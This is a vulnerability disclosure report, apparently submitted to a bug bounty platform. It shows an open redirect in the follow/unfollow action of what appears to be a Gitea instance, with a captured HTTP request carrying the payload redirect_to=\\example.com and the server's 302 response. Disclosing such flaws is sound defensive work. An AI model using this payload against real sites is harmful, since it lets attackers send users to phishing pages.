Description

The idea is similar to CVE-2022-1058 ( https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ ).
Browsers interpreted \\example.com -> https://example.com and lead to open redirect

Proof of Concept

The vulnerable API is lie in follow/unfollow action on user’s profile.
In order to quickly reproduce the bug:

• Click on any User Profile
• Click Follow/Unfollow- Intercept API calls with burp

Vulnerable parameter: redirect_to

POST /admin123?action=follow&redirect_to=\\example.com HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: null
Connection: close
Cookie: i_like_gitea=7c60991704df67dd; lang=en-US; _csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

_csrf=kxOfYgnfpMMIT6mWaCfzPYRHdI46MTY4NjA0MjMxNDcwMTE0ODY5OQ

Response from server:

HTTP/1.1 302 Found
Location: /\\example.com
Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Date: Wed, 07 Jun 2023 07:32:30 GMT
Content-Length: 0
Connection: close

Following a successful POST request will redirect user back to example.com . Location header will be set to /\\example.com and will be interpreted by the browser as a redirect to //example.com